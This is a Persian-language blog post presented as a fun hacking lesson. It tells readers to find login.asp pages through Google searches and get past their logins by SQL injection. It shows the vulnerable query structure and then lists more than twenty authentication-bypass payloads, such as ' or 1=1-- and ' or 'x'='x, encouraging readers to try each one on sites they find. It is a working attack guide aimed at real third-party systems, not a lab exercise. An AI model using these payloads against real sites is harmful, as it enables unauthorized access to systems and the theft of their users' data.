عشق اینترنت

 دوستان عزیز سلام . امروز یه اموزش با حال هک براتون دارم .

یكی از نقطه ضعف های Sql رشته ی ساختار ان میباشد كه همیشه آسیب پذیر بوده و مورد حمله قرار میگیرد این آموزش به شما روشهایی یاد میده كه بتوانید این ساختار را مورد حمله قرار بدهید .
حالا میتوانید در گوگل عبارت زیر را سرچ كنید :
login.asp
در جواب برای شما تقریبا 17 هزار مورد پیدا میكند . حالا به لینك یافته ها دقت كنید مثلا چنین خواهید یافت :
www.site.com/login.asp
یا چیزهایی مشابه این . این قسمتها را میتوانیم مورد حمله قرار دهیم . حالا به ساده ترین قسمت رسیدیم
كافی است برای رد كردن این مانع بصورت زیر عمل كنید
بجای یوزر نیم Admin را بزنید و بجای پسورد از این عبارت استفاده كنید
or 1=1—
شاید تا حالا كه مقاله را خوانده اید تعجب كرده اید كه این امر چگونه امكان پذیر است . در تمامی این عملیات اطلاعات لاگین شما بصورت Query فرستاده میشود . اگر اطلاعات درست باشد شما اجازه ی ورود خواهید یافت وگرنه با پیغام Login Failed مواجه خواهید شد . وقتی شما ارسالی را با یوزر ادمین و با پسورد 1234 را ارسال میكنید از حالت اول به حالت دوم تغییر پیدا میكند :
حالت اول :
"select *from table1 where login=""&log&""and password=""pwd&"" '
حالت دوم‌:

"select *from table1 where login="Admin"and password="1234" '
حالا با استفاده از این تركیبات شما میتوانید با توجه به ساختار اس كیو ال برای آن پسورد هایی ارسال كنید كه در صورت قرار گرفتن در این پسورد مورد قبول قرار گیرد و در واقع با استفاده از نقطه ضعف Query Stringsبه آن حمله كند . این تركیبات كه با توجه به ساختار اس كیو ال نوشته شده به این صورت میباشد نمونه هایی از آن مشاهده میكنید :
admin'--

' or 0=0 --

" or 0=0 --

or 0=0 --

' or 0=0 #

" or 0=0 #

or 0=0 #

' or 'x'='x

" or "x"="x

') or ('x'='x

' or 1=1--

" or 1=1--

or 1=1--

' or a=a--

" or "a"="a

') or ('a'='a

" or ("a"="a

hi" or "a"="a

hi" or 1=1 --

hi' or 1=1 --

hi' or 'a'='a

hi') or ('a'='a

hi" or ("a"="a

همانطور كه مشاهده كردید این روش یك روش ساده اما ابتكاری مباشد كه احتیاج به تفكر دقیق دارد البته ساختار ها متفاوت میباشند و شما میتوانید همه ی این تركیبات بالا را به عنوان پسورد امتحان كنید و حتما به جواب خواهید رسید .

موفق باشـــید!

علی یارتون

ارسال به